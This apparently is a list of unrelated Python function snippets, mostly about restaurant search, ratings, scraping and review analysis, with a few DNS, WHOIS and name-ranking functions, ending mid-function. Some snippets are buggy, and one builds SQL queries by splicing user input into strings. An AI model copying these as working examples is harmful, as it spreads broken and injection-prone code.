"def calcRestaurantList2(latlngs, cuisines, distance):\n restlist = []\n used = []\n cuisine = str(cuisines[0])\n if len(cuisines) > 1:\n cuisine = \",\".join(cuisines)\n minrating = 5.0\n worst = ''\n ratings = []\n for point in latlngs:\n yelpresults = search2(cuisine,point,distance)['businesses']\n processedyelpresults = processResults(yelpresults)\n for result in processedyelpresults:\n if (result not in used):\n if len(restlist) < 40:\n restlist.append(processedyelpresults[result])\n used.append(result)\n ratings.append(float(processedyelpresults[result]['rating']))\n if float(processedyelpresults[result]['rating']) < minrating:\n minrating = float(processedyelpresults[result]['rating'])\n worst = result\n # print (\"The worst restaurant is {0}\".format(worst))\n elif len(restlist) >= 40:\n ratings.sort()\n minrating = ratings[0]\n if float(processedyelpresults[result]['rating']) > ratings[0]:\n if worst in restlist:\n ratings.remove(minrating)\n restlist.remove(restlist.index(worst))\n # print (\"Removed {0}, which had a rating of {1}. It was in restlist\".format(worst, minrating))\n if len(restlist) <= 45:\n restlist.append(processedyelpresults[result])\n # print (\"Added {0}, which had a rating of {1}\".format(result, processedyelpresults[result]['rating']))\n else:\n minrating = float(ratings[0])\n # print (\"The minimum rating for a restaurant is {0}\".format(minrating))\n for r in restlist:\n # print (r)\n if float(r['rating']) == minrating:\n restlist.remove(r)\n # print (\"Removed {0}, which had a rating of {1}. Matched on minrating\".format(r, minrating))\n if minrating in ratings:\n ratings.remove(minrating)\n if len(restlist) <= 45:\n restlist.append(processedyelpresults[result])\n # print (\"Added {0}, which had a rating of {1}\".format(result, processedyelpresults[result]['rating']))\n\n # pprint.pprint(restlist)\n # print(used)\n\n return restlist",
"def getRestaurantAddressDict(restaurants):\n addressdict = {}\n for rest in restaurants:\n if 'address' in rest:\n addressstring = str(rest['address']) + ' ' + str(rest['city'])\n addressdict[addressstring] = rest['name']\n\n return addressdict",
"def analyse(self):\n self.__gather_tagged_reviews(self._restaurants)",
"def parse_restaurant_name(text):\n stripped = text.lower()\n\n for name_list in RESTAURANT_NAMES:\n for name in name_list:\n if name.lower() in stripped:\n return name_list[0]\n\n return \"\"",
"def process(data):\n # words to scrub from data\n strip_words = [\n 'avenue',\n 'ave',\n 'street',\n 'boulevard',\n 'blvd',\n 'st',\n 'road',\n 'rd',\n 'court',\n 'ct',\n 'guest',\n 'guests',\n 'family',\n 'spouse',\n 'spouses'\n ]\n # quick and dirty translator for scrubbing punctuation from data\n translator = str.maketrans({key: None for key in string.punctuation})\n for i in range(len(data)):\n indx, name, addr = data[i] # ,zipc,twn,apt\n\n # scrub the data and normalize to lowercase\n name = name.translate(translator)\n addr = addr.translate(translator)\n name = name.lower()\n addr = addr.lower()\n name = replace_all(name, strip_words)\n addr = replace_all(addr, strip_words)\n\n # identify similar entries from the remainder of the data\n matches = []\n for j in range(i + 1, len(data)):\n\n # scrub the data\n n_indx, n_name, n_addr = data[j] # ,n_zipc,n_twn,n_apt\n n_name = n_name.translate(translator)\n n_addr = n_addr.translate(translator)\n n_name = n_name.lower()\n n_addr = n_addr.lower()\n n_name = replace_all(n_name, strip_words)\n n_addr = replace_all(n_addr, strip_words)\n # print(addr, n_addr)\n\n # check for similarity\n # TODO: should a report be made if only one of these is similar?\n if sim(name, n_name) and sim(addr, n_addr):\n matches.append(data[j])\n\n # report the matches found\n if len(matches) > 0:\n tmp = \"%d: %s, %s\"\n s1 = tmp % tuple(data[i])\n s2 = \"*\" * 15\n print(s1)\n print(s2)\n for m in matches:\n print(tmp % tuple(m))\n print(\"\\n\")",
"def summarize_food_data(unprocessed_food_list: List[str]) -> List[Dict[str, str]]:\n summary: List[Dict[str, str]] = []\n item_count_data: Dict[str, int] = {}\n\n for item in unprocessed_food_list:\n if item not in item_count_data:\n item_count_data[item] = 1\n else:\n item_count_data[item] += 1\n \n for product in item_count_data:\n item_information: Dict[str, str] = {}\n item_information[\"name\"] = product\n item_information[\"quantity\"] = str(item_count_data[product])\n item_information[\"units\"] = \"-\"\n summary.append(item_information)\n \n return summary",
"def Collection_search_name(C:list, name:str) -> list:\r\n restaurants = []\r\n for r in C:\r\n for dish in r.menu:\r\n if name in dish.name:\r\n restaurants.append(r)\r\n return restaurants",
"def results():\n\n queryName = request.form['query']\n queryStars = request.form['stars']\n \n datasource = DataSource()\n listOfRestaurantNames = datasource.searchRestaurantsByNameAndMinimumStars(queryName, queryStars)\n restaurants = datasource.generateRestaurantObjects(listOfRestaurantNames[:15])\n\n return render_template('results.html', restaurants=restaurants)",
"def name_totals(name_object,name):\r\n total_names = {}\r\n total_names[name] = sum(name_object['pops'].values())\r\n return total_names",
"def collect_data(self, data: Restaurant) -> Restaurant:\n return data",
"def restaurants_all() -> str:\n restaurant_objects = restaurants.load_restaurants()\n return jsonify(restaurant_objects)",
"def collect_data(self, data: Restaurant) -> Restaurant:\n print('-' * 40)\n print(f'{data.name} | {data.pnr}')\n params = {\n 'produ': data.pnr,\n 'country': 'dk',\n 'token': FilterXMLConfig.cvrapi_api_key()\n }\n headers = {\n 'User-Agent': 'sw814f21 - FindSmiley app - Jonas Andersen'\n }\n\n res = get(self.URL, params=params, headers=headers)\n content = json.loads(res.content.decode('utf-8'))\n\n if res.status_code == 200:\n for appender in self.appenders:\n data = appender(content, data)\n else:\n print(f'Skipping restaurant with p-nr {data.pnr}: record not found remotely')\n\n return super().collect_data(data)",
"def test_nyc_restaurant_grades():\n\tcamisarray = cleandata.CAMIS.unique()# get the CAMIS_ID uniquely\n\tsumgrade = [] # the list that contain all restaurants' sum grade\n\tfor i in range(len(camisarray)):\n\n\t\tcamis_id = camisarray[i]# get each restaurant's CAMIS_ID\n\t\tgradeseries = (cleandata[cleandata.CAMIS == camis_id]).GRADE\n\t\ttempList = []\n\t\tfor ele in gradeseries:\n\t\t\ttempList.append(ele) ###### the tempList is used to calculate each restaurant's grade\n\t\tk = test_grades(tempList) ### k is the sum grade of each restaurant \n\t \tsumgrade.append(k) #### list sumgrade append each restaurant's grade a\n\treturn sum(sumgrade) ###return the sum of all restaurants ",
"def query_api(term, location, RADIUS_SIZE, RESTRICTED):\n response = search(API_KEY, term, location, 0, RADIUS_SIZE)\n businesses = response.get('businesses')\n\n if not businesses:\n print(u'No businesses for {0} in {1} found.'.format(term, location))\n return\n numFound = 0\n while len(businesses) >= 50 + numFound:\n numFound += 50\n response = search(API_KEY, term, location, numFound, RADIUS_SIZE)\n more_businesses = response.get('businesses')\n if more_businesses is not None:\n businesses.extend(more_businesses)\n\n names = []\n contacts = []\n addresses = []\n urls = []\n categories = []\n city = []\n state = []\n zipcode = []\n radius = []\n #Create a list from the names\n #Cross reference with restricted and delete elements that are matching\n for i in range(0, len(businesses)):\n not_matched = True\n for j in range (0, len(RESTRICTED)):\n if(businesses[i]['name'] == RESTRICTED[j].strip('\\n')):\n not_matched = False\n if(not_matched and (businesses[i]['distance']) < RADIUS_SIZE):\n names.append(businesses[i]['name'])\n radius.append(businesses[i]['distance'] / 1600)\n contacts.append(businesses[i]['display_phone'])\n addresses.append(businesses[i]['location']['address1'])\n city.append(businesses[i]['location']['city'])\n state.append(businesses[i]['location']['state'])\n zipcode.append(businesses[i]['location']['zip_code'])\n categories.append(businesses[i]['categories'][0]['title'])\n urls.append(businesses[i]['url'])\n list_restaurants = open('target_restaurants.txt', 'w')\n for x in range(0, len(names)):\n try:\n list_restaurants.write(\"%s\\t\" % names[x])\n list_restaurants.write(\"%s\\t\" % contacts[x])\n list_restaurants.write(\"%s\\t\" % radius[x])\n list_restaurants.write(\"%s\\t\" % addresses[x])\n list_restaurants.write(\"%s\\t\" % city[x])\n list_restaurants.write(\"%s\\t\" % state[x])\n list_restaurants.write(\"%s\\t\" % zipcode[x])\n list_restaurants.write(\"%s\\t\" % categories[x])\n list_restaurants.write(\"%s\\n\" % urls[x])\n except UnicodeEncodeError:\n continue\n\n print(\"Businesses found and printed to target_restaurants.txt file\")",
"def restaurant_rater(input_filename):\n\n #Open input file\n restaurant_scores_source = open(input_filename)\n\n #Initialize restaurant_ratings dictionary\n restaurant_ratings = {}\n\n #Ask user for a restaurant name and rating and store resulting strings\n user_add_restaurant = raw_input(\"Please add the name of a restaurant you would like to rate: \")\n user_add_score = int(raw_input(\"Please enter the rating: \"))\n\n #Add user input to dictionary\n restaurant_ratings.update({user_add_restaurant: user_add_score})\n\n #Loop through each line in input file\n for line in restaurant_scores_source:\n #Strips and splits each line at : and unpacks list into name and rating\n name, rating = line.rstrip().split(\":\")\n\n #Add keys and values to restaurant_ratings based on name and rating\n restaurant_ratings[name] = int(rating)\n\n for restaurant in sorted(restaurant_ratings):\n print restaurant, \"is rated at\", restaurant_ratings[restaurant]\n \n restaurant_scores_source.close()",
"def appending_food_item_names(food_item_names: list) -> None:\n for item in _calories:\n food_item_names.append(item)",
"def restaurant_ratings(filename):\n\n lines = open(filename)\n\n restaurant_dict = {}\n\n\n for restaurants in lines:\n restaurants = restaurants.rstrip()\n restaurant, rating = restaurants.split(\":\")\n\n restaurant_dict[restaurant] = int(rating)\n\n # user_input_restaurant()\n\n # restaurant_dict[user_restaurant_input[0]] = user_restaurant_input[1]\n\n # sorted_restaurants = sorted(restaurant_dict.items())\n\n\n # for restaurant, rating in sorted_restaurants:\n # print \"%s is rated at %s\" % (restaurant, rating)\n\n return restaurant_dict",
"def consolidate_ingredients(breakfasts, lunches, dinners):\n total_ingredients = {}\n meals = [breakfasts, lunches, dinners]\n\n for meal in meals:\n for collection in meal:\n ingredients = fetch_ingredients(collection)\n for lst in ingredients:\n if lst[0] in total_ingredients:\n total_ingredients[lst[0]][0] += lst[1]\n total_ingredients[lst[0]][1].add(lst[2])\n else:\n total_ingredients[lst[0]] = [lst[1], set([lst[2]])]\n\n return total_ingredients",
"def get_organism_names(results):\r\n\r\n organism_names = []\r\n\r\n for result in results:\r\n organism_names.append(result)\r\n\r\n return organism_names",
"def read_restaurant(file):\r\n name_to_rating = {}\r\n price_to_names = {'$':[], '4$':[],'$$$':[],'$$':[]}\r\n cuisine_to_names = {}",
"def flatten(counts):\n single_names = {}\n long_names = {}\n for i in range(len(counts.items())):\n if(len(counts.items()[i][0].split(\" \")) <= 1):\n single_names[str(counts.items()[i][0])] = counts.items()[i][1]\n else:\n long_names[str(counts.items()[i][0])] = counts.items()[i][1]\n \n starter_list = [[[x[0]],x[1]] for x in long_names.items()]\n for i in range(len(single_names.items())):\n matched = False\n for j in range(len(starter_list)):\n if(single_names.items()[i][0] in starter_list[j][0][0].split(\" \")):\n starter_list[j][0].append(single_names.items()[i][0])\n starter_list[j][1] += single_names.items()[i][1]\n matched = True\n break\n \n if(matched == False):\n starter_list.append([[single_names.items()[i][0]], single_names.items()[i][1]]) \n \n \n return starter_list",
"def drug_names():\n results = set()\n if 'qry' in request.args and len(request.args['qry']) >= 3:\n look_for = f\"{request.args['qry'].lower()}%\"\n drug_list = FTA.find_by_name(look_for, False )\n results = set([f\"{d.PROPRIETARY_NAME} - {d.NONPROPRIETARY_NAME}\" for d in drug_list if d.ACTIVE])\n\n results = sorted(list(results))\n return jsonify(results)",
"def get_restaurants():\n restaurants = []\n start = 0\n\n while(True):\n response = requests.get(REQUEST_URL + \"&start=\" + str(start), \\\n headers=HEADERS)\n response_body = json.loads(response.text)\n if (response_body[\"results_shown\"] < 1):\n break\n \n restaurants += response_body[\"restaurants\"] \n start += 20\n\n return restaurants",
"def compute_allergens(foods):\n\n # Create a dictionary mapping allergens to lists\n # of ingredients that may contain that allergen\n allergen_foods = {}\n for ingredients, allergens in foods:\n for allergen in allergens:\n allergen_foods.setdefault(allergen, []).append(set(ingredients))\n\n # For each allergen, compute the intersection of the lists\n # computed above. This will give us the set of ingredienta\n # that could contain that allergen\n candidate_ingredients = {}\n for allergen in allergen_foods:\n candidate_ingredients[allergen] = set.intersection(*allergen_foods[allergen])\n\n # Repeatedly find an allergen that can only be matched to a single\n # ingredient, and remove that ingredient from the list of candidate\n # ingredients for all the other allergens.\n allergens = {}\n while len(candidate_ingredients) > 0:\n\n for single_allergen, cings in candidate_ingredients.items():\n if len(cings) == 1:\n ingredient = cings.pop()\n allergens[single_allergen] = ingredient\n break\n\n del candidate_ingredients[single_allergen] \n\n for allergen in candidate_ingredients:\n if allergen != single_allergen:\n ingredient = allergens[single_allergen]\n candidate_ingredients[allergen].discard(ingredient)\n\n return allergens",
"def alphabetize_restaurant(filename):\n\n restaurant_reviews = open(filename)\n\n book_of_reviews = []\n for line in restaurant_reviews:\n reviews = line.rstrip()\n reviews_list = reviews.split(\":\")\n book_of_reviews.append(reviews_list)\n \n dictionary_reviews = {}\n for review in book_of_reviews: \n dictionary_reviews[review[0]] = review[1]\n\n new_restaurant = input(\"What is the name of your restaurant? > \") \n new_rating = int(input(\"What is the rating of your restaurant? > \"))\n \n dictionary_reviews[new_restaurant] = new_rating \n \n dictionary_reviews = sorted(dictionary_reviews.items())\n \n for restaurant_name in dictionary_reviews:\n print(f\"{restaurant_name[0]} is rated at {restaurant_name[1]}.\")",
"def findARestaurant(mealType,location):\n\t#1. Use getGeocodeLocation to get the latitude and longitude coordinates of the location string.\n\t# lat_lng = f\"{getGeocodeLocation(location)}\"\n\t# lat_lng_formatted = lat_lng[lat_lng.find(\"(\")+1:lat_lng.find(\")\")]\n\tlatitude, longitude = getGeocodeLocation(location)\n\n\t#2. Use foursquare API to find a nearby restaurant with the latitude, longitude, and mealType strings.\n\t#HINT: format for url will be something like https://api.foursquare.com/v2/venues/search?client_id=CLIENT_ID&client_secret=CLIENT_SECRET&v=20130815&ll=40.7,-74&query=sushi\n\turl = (f\"https://api.foursquare.com/v2/venues/search?client_id={foursquare_client_id}&client_secret={foursquare_client_secret}&v={version}&ll={latitude},{longitude}&intent=browse&radius=10000&query={mealType}&limit=10\")\n\th = httplib2.Http()\n\tresult = json.loads(h.request(url, \"GET\")[1])\n\n\t#3. Grab the first restaurant\n\tvenue_id = result[\"response\"][\"venues\"][0][\"id\"]\n\tvenue_name = result[\"response\"][\"venues\"][0][\"name\"]\n\tvenue_location = result[\"response\"][\"venues\"][0][\"location\"]\n\n\t#4. Get a 300x300 picture of the restaurant using the venue_id (you can change this by altering the 300x300 value in the URL or replacing it with 'orginal' to get the original picture\n\timg_url = (f\"https://api.foursquare.com/v2/venues/{venue_id}/photos?client_id={foursquare_client_id}&client_secret={foursquare_client_secret}&v={version}&group=venue&limit=10\")\n\timg_h = httplib2.Http()\n\timg_result = json.loads(img_h.request(img_url, \"GET\")[1])\n\tprint(img_result)\n\n\t#5. Grab the first image\n\tif len(img_result[\"response\"][\"photos\"][\"items\"]) > 0:\n\t\timg_url = f\"{img_url_pre_lim['prefix']}300x300{img_url_pre_lim['suffix']}\"\n\n\t#6. If no image is available, insert default a image url\n\telse:\n\t\timg_url = \"https://cps-static.rovicorp.com/3/JPG_400/MI0003/711/MI0003711195.jpg?partner=allrovi.com\"\n\n\t#7. Return a dictionary containing the restaurant name, address, and image url\t\n\tresult = {\"name\": venue_name, \"address\": venue_location.get(\"address\",\"\"), \"img_url\": img_url}\n\tprint(result)\n\treturn result",
"def query_restaurants_by_name_and_location(collection, restaurant_name, radius, lat, lon):\n results = collection.find(\n {'location': {'$nearSphere': {'$geometry': {'type': \"Point\",\n 'coordinates': [float(lon), float(lat)]},\n '$maxDistance': radius}},\n 'name': {'$regex': restaurant_name, \"$options\": \"i\"}},\n {\"_id\": 0})\n\n return results",
"def memorize_restaurant_facts(self, name, cuisine=None, location=None):\n n = self._add_node(name, \"restaurant_name\")\n if cuisine is not None:\n c = self._add_node(cuisine, \"cuisine\")\n n.relationships.create(\"is_a\", c)\n if location is not None:\n l = self._add_node(location, \"location\")\n n.relationships.create(\"located\", l)",
"def get_athletes(self, nocs=[], names=[]):\n query_head = '''SELECT DISTINCT athletes.full_name, nocs.noc_name\n FROM athletes, nocs, athletes_nocs\n WHERE athletes.id = athletes_nocs.athlete_id\n AND nocs.id = athletes_nocs.noc_id'''\n \n query_tail = '''ORDER BY athletes.full_name;'''\n\n final_result_set = set()\n\n if nocs:\n noc_result_set = set()\n for noc in nocs:\n query_full = query_head + \\\n \"\\nAND nocs.noc_name like '%{}%'\".format(noc.upper())\\\n + query_tail\n self.__cursor.execute(query_full)\n for row in self.__cursor:\n noc_result_set.add(row)\n final_result_set = noc_result_set\n\n if names:\n name_result_set = set()\n for name in names:\n query_full = query_head + \\\n \"\\nAND lower(athletes.full_name) like '%{}%'\".format(name.lower())\\\n + query_tail\n self.__cursor.execute(query_full)\n for row in self.__cursor:\n name_result_set.add(row)\n \n if final_result_set:\n final_result_set &= name_result_set \n else:\n final_result_set = name_result_set \n \n final_result_list = sorted(list(final_result_set), key=lambda x: x[0])\n return final_result_list",
"def collect_results(name: str) -> dict:\n full_response = {}\n target_name = dns.name.from_text(name)\n # lookup CNAME\n response = lookup(target_name, dns.rdatatype.CNAME)\n cnames = []\n for answers in response.answer:\n for answer in answers:\n cnames.append({\"name\": answer, \"alias\": name})\n # lookup A\n response = lookup(target_name, dns.rdatatype.A)\n arecords = []\n for answers in response.answer:\n a_name = answers.name\n for answer in answers:\n if answer.rdtype == 1: # A record\n arecords.append({\"name\": a_name, \"address\": str(answer)})\n # lookup AAAA\n response = lookup(target_name, dns.rdatatype.AAAA)\n aaaarecords = []\n for answers in response.answer:\n aaaa_name = answers.name\n for answer in answers:\n if answer.rdtype == 28: # AAAA record\n aaaarecords.append({\"name\": aaaa_name, \"address\": str(answer)})\n # lookup MX\n response = lookup(target_name, dns.rdatatype.MX)\n mxrecords = []\n for answers in response.answer:\n mx_name = answers.name\n for answer in answers:\n if answer.rdtype == 15: # MX record\n mxrecords.append({\"name\": mx_name,\n \"preference\": answer.preference,\n \"exchange\": str(answer.exchange)})\n\n full_response[\"CNAME\"] = cnames\n full_response[\"A\"] = arecords\n full_response[\"AAAA\"] = aaaarecords\n full_response[\"MX\"] = mxrecords\n\n return full_response",
"def get_all_restaurants():\n return list(Restaurant.objects.all().values())",
"def calculate_total_score(data, ratings):\n total_score = 0\n\n for x in data:\n x_key = generate_name_key(x)\n total_score += ratings[x_key]['avg_score'] if x_key in ratings else 0\n\n return total_score",
"def parse_one_restaurant():\n\t\n\t# Used for determining on which page error occurs\n\tglobal on_tags, on_details\n\ttry:\n\t\ton_details = True\n\t\ton_tags = False\n\t\t\n\t\t# Get all of useful params of this page\n\t\tname = wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, 'h1.section-hero-header-title-title'))).text\n\t\ttype = driver.find_element_by_css_selector(\n\t\t\t'div.GLOBAL__gm2-body-2:nth-child(2)>span:nth-child(1)>span:nth-child(1)>button:nth-child(1)').text\n\t\tcost = driver.find_element_by_css_selector(\n\t\t\t'span.section-rating-term:nth-child(2)>span:nth-child(2)>span:nth-child(1)>span:nth-child(2)').text\n\t\trating_and_num = driver.find_element_by_css_selector('div.GLOBAL__gm2-body-2')\n\t\trating = rating_and_num.text.split('\\n')[0]\n\t\tnum = rating_and_num.text.split('\\n')[1].split('·')[0]\n\t\topen_hours = driver.find_element_by_css_selector('span.section-info-text:nth-child(2)').text.strip()\n\t\t\n\t\t# Get to the all tags of restaurant page\n\t\ttags_page = wait.until(EC.element_to_be_clickable((By.CSS_SELECTOR, '.section-editorial')))\n\t\ttry:\n\t\t\ttags_page.click()\n\t\texcept ElementClickInterceptedException:\n\t\t\tsleep(0.2)\n\t\t\ttags_page.click()\n\t\ton_tags = True\n\t\ton_details = False\n\t\t\n\t\t# Get params from tags page\n\t\tneg = driver.find_elements_by_class_name('section-attribute-group-item-negative')\n\t\tall_negs = set(i.text for i in neg)\n\t\tpos = driver.find_elements_by_class_name('section-attribute-group-item')\n\t\tall_pos = set(i.text for i in pos) - all_negs\n\t\t\n\t\t# Create new Restaurant class so that all params are gathered together\n\t\tcollected_rest = Restaurant(name, type, cost, rating, num, open_hours, all_pos, all_negs)\n\t\treturn collected_rest.to_numpy_array()\n\t\t\n\t# Catch an error and so skip current restaurant\n\texcept (IndexError, NoSuchElementException, TimeoutException):\n\t\treturn None",
"def collect_results(name: str) -> dict:\n full_response = {}\n\n target_name = dns.name.from_text(name)\n\n # lookup CNAME\n response = lookup(target_name, dns.rdatatype.CNAME)\n cnames = []\n if response is not None:\n for answers in response.answer:\n for answer in answers:\n cnames.append({\"name\": answer, \"alias\": name})\n\n # lookup A\n response = lookup(target_name, dns.rdatatype.A)\n arecords = []\n\n if response is not None:\n for answers in response.answer:\n a_name = answers.name\n for answer in answers:\n if answer.rdtype == 1: # A record\n arecords.append({\"name\": a_name, \"address\": str(answer)})\n\n # lookup AAAA\n response = lookup(target_name, dns.rdatatype.AAAA)\n aaaarecords = []\n\n if response is not None:\n for answers in response.answer:\n aaaa_name = answers.name\n for answer in answers:\n if answer.rdtype == 28: # AAAA record\n aaaarecords.append({\"name\": aaaa_name, \"address\": str(answer)})\n\n # lookup MX\n response = lookup(target_name, dns.rdatatype.MX)\n mxrecords = []\n if response is not None:\n for answers in response.answer:\n mx_name = answers.name\n for answer in answers:\n if answer.rdtype == 15: # MX record\n mxrecords.append({\"name\": mx_name,\n \"preference\": answer.preference,\n \"exchange\": str(answer.exchange)})\n\n full_response[\"CNAME\"] = cnames\n full_response[\"A\"] = arecords\n full_response[\"AAAA\"] = aaaarecords\n full_response[\"MX\"] = mxrecords\n\n return full_response",
"def collect_data(self, data: Restaurant) -> Restaurant:\n print('-' * 40)\n print(f'{data.name} | {data.pnr}')\n params = {\n 'enhedstype': 'produktionsenhed',\n 'id': data.pnr,\n 'language': 'da',\n 'soeg': data.pnr,\n }\n\n print(f'{self.URL} | {params}')\n res = get(self.URL, params=params)\n soup = BeautifulSoup(res.content.decode('utf-8'), 'html.parser')\n\n for appender in self.appenders:\n data = appender(soup, data)\n\n return super().collect_data(data)",
"def baby_search_engine(name):\r\n \r\n name_ranking = []\r\n \r\n for publication_name, name_list in baby_names.items():\r\n publication = {}\r\n if name.capitalize() in name_list:\r\n publication['list'] = publication_name\r\n publication['rank'] = name_list.index(name.capitalize()) + 1\r\n name_ranking.append(publication)\r\n\r\n \r\n return sorted(name_ranking, key=lambda k: k['rank'])",
"def get_names(parsed_data):\n known_values = []\n result = []\n # get name from contacts\n contacts = {'registrant_contact': [], 'administrative_contact': [], 'technical_contact': [],\n 'domain_registrar': []}\n if 'registrant_contact' in parsed_data:\n contacts['registrant_contact'].append(parsed_data['registrant_contact'])\n if 'administrative_contact' in parsed_data:\n contacts['administrative_contact'].append(parsed_data['administrative_contact'])\n if 'technical_contact' in parsed_data:\n contacts['technical_contact'].append(parsed_data['technical_contact'])\n if 'domain_registrar' in parsed_data:\n contacts['domain_registrar'].append(parsed_data['domain_registrar'])\n\n for contact, info in contacts.items():\n # properties dictionary\n fax = {'fax': '', 'type': 4}\n phone = {'phone': '', 'type': 4}\n country = {'country': '', 'type': 11}\n street = {'street': '', 'type': 8}\n city = {'city': '', 'type': 11}\n email = {'email': '', 'type': 2}\n if info is not None:\n d = {'type': 11, 'data': '', 'properties': {}, 'special_properties': {}, 'ref': {}}\n properties_list = []\n special_properties_list = []\n d.update({'ref': {'task': 'whois', 'whois_for': '', 'whois_from': ''}})\n if 'domain_name' in parsed_data and len(parsed_data['domain_name']) > 0:\n d['ref']['whois_for'] = parsed_data['domain_name']\n if 'whois_server' in parsed_data:\n d['ref']['whois_from'] = parsed_data['whois_server']\n\n for name in info:\n if 'full_name' in name:\n if name['full_name'] in known_values:\n break\n if 'registrar_name' in name:\n if name['registrar_name'] in known_values:\n break\n\n for feature in name.keys():\n if feature == 'full_name':\n d['data'] = name['full_name']\n known_values.append(name['full_name'])\n if feature == 'registrar_name':\n d['data'] = name['registrar_name']\n known_values.append(name['registrar_name'])\n if feature == 'city_name':\n city['city'] = name['city_name']\n if feature == 'street_name':\n street['street'] = name['street_name']\n if feature == 'country_name':\n country['country'] = name['country_name']\n if feature == 'phone_number':\n phone['phone'] = name['phone_number']\n if feature == 'fax_number':\n fax['fax'] = name['fax_number']\n if feature == 'email_address':\n email['email'] = name['email_address']\n # if name is null, discard other info\n if d['data'] == '':\n continue\n # saving name special properties\n special_properties_list.append({'is_username': False, 'type': 0})\n special_properties_list.append({'is_domain_name': False, 'type': 0})\n special_properties_list.append({'is_public_name': False, 'type': 0})\n special_properties_list.append({'is_account_name': False, 'type': 0})\n d['special_properties'] = special_properties_list\n properties_list.append(fax)\n properties_list.append(phone)\n properties_list.append(country)\n properties_list.append(street)\n properties_list.append(city)\n properties_list.append(email)\n d['properties'] = properties_list\n result.append(d)\n return result",
"def describe_restaurant(self):\n\t\tprint(\"name of the restaurant is \" + self.restaurant_name)\n\t\tprint(\"cuisine type is \" + self.cuisine_type)",
"def extracttfidf_restaurant(restaurant_indexed_reviews):\n restaurant_feature = dict()\n restaurant_all_reviews = []\n for restaurant in restaurant_indexed_reviews:\n reviews_content = ''\n for user in restaurant_indexed_reviews[restaurant]:\n reviews = restaurant_indexed_reviews[restaurant][user]\n for review in reviews:\n reviews_content += review['text'][0:len(review['text'])-1]\n restaurant_all_reviews.append(reviews_content)\n\t# count words\n vectorizer = TfidfVectorizer(min_df=1)\n word_count = vectorizer.fit_transform(restaurant_all_reviews)\n i = 0\n for restaurant in restaurant_indexed_reviews:\n restaurant_feature[restaurant] = word_count[i, :]\n i = i + 1\n return restaurant_feature",
"def print_alph_restaurant_ratings(restaurant_dict): \n\n for restaurant_name, rating in sorted(restaurant_dict.items()):\n # print \"{} is rated at {}.\".format(restaurant_name,\n # rating)\n\n \n restaurant_name = restaurant_dict.items[0]\n rating = restaurant_dict.items[1]\n\n print restaurant_name, rating",
"def extracttfidf_user(user_indexed_reviews, all_reviews, restaurant_indexed_reviews):\n user_all_reviews = []\n # count vector num in user_count\n user_count = dict()\n X_total = dict()\n y_total = dict()\n restaurant_feature = dict()\n ratings = []\n for user in user_indexed_reviews:\n user_count[user] = 0\n restaurant_reviews = user_indexed_reviews[user]\n for restaurant in restaurant_reviews:\n # extract feature\n reviews_content = ''\n reviews = restaurant_reviews[restaurant]\n for review in reviews:\n reviews_content += review['text'][0:len(review['text'])-1]\n if reviews_content == '':\n continue\n user_all_reviews.append(reviews_content)\n # compute label\n rating = round(utils.cal_average_rating(reviews)*2)\n ratings.append(rating)\n # count words\n user_count[user] += 1\n user_all_reviews += all_reviews\n vectorizer = TfidfVectorizer(min_df=1)\n word_count = vectorizer.fit_transform(user_all_reviews)\n\n sum_count = 0\n for user in user_indexed_reviews:\n if user_count[user] == 0:\n X_total[user] = None\n y_total[user] = None\n else:\n X_total[user] = word_count[sum_count:sum_count+user_count[user]+1, :]\n y_total[user] = np.array(ratings[sum_count:sum_count+user_count[user]+1])\n sum_count += user_count[user]\n\n i = sum_count\n for restaurant in restaurant_indexed_reviews:\n restaurant_feature[restaurant] = word_count[i, :]\n i = i + 1\n print i, sum_count\n return X_total,y_total,restaurant_feature",
"def gets_restaurant_ratings(text_file):\n file = open(text_file)\n restaurant_ratings_dictionary = {}\n\n for line in file:\n line = line.rstrip().split(\":\")\n restaurant_name, rating = line\n restaurant_ratings_dictionary[restaurant_name] = rating\n\n file.close()\n\n return restaurant_ratings_dictionary",
"def aggregate_results(self):\n\n raise NotImplementedError",
"def get_alternative_restaurants(self,alternative_preferences):\n import itertools\n all_alternative_pref=[]\n all_alternative_restaurants=[]\n for r in itertools.product(alternative_preferences[0], alternative_preferences[1],alternative_preferences[2]): \n all_alternative_pref.append([r[0], r[1],r[2]])\n for a in all_alternative_pref:\n all_alternative_restaurants.append(self.lookup(a))\n all_alternative_restaurants = [item for sublist in all_alternative_restaurants for item in sublist]\n\n return all_alternative_restaurants",
"async def flavors():\n berry = []\n apple = []\n honey = []\n mango = []\n earthy = []\n mint = []\n blueberry = []\n ammonia = []\n coffee = []\n vanilla = []\n rose = []\n pine = []\n citrus = []\n sweet = []\n pineapple = []\n skunk = []\n orange = []\n strawberry = []\n lemon = []\n grape = []\n lime = []\n pepper = []\n lavender = []\n\n for i in list(range(len(strain))):\n if 'Coffee' in strain['flavor'][i]:\n coffee.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Pepper' in strain['flavor'][i]:\n pepper.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Lavender' in strain['flavor'][i]:\n lavender.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Mango' in strain['flavor'][i]:\n mango.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Earthy' in strain['flavor'][i]:\n earthy.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Citrus' in strain['flavor'][i]:\n citrus.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Lemon' in strain['flavor'][i]:\n lemon.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Strawberry' in strain['flavor'][i]:\n strawberry.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Pine' in strain['flavor'][i]:\n pine.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Vanilla' in strain['flavor'][i]:\n vanilla.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Honey' in strain['flavor'][i]:\n honey.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Pineapple' in strain['flavor'][i]:\n pineapple.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Blueberry' in strain['flavor'][i]:\n blueberry.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Orange' in strain['flavor'][i]:\n orange.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Skunk' in strain['flavor'][i]:\n skunk.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Grape' in strain['flavor'][i]:\n grape.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Berry' in strain['flavor'][i]:\n berry.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Lime' in strain['flavor'][i]:\n 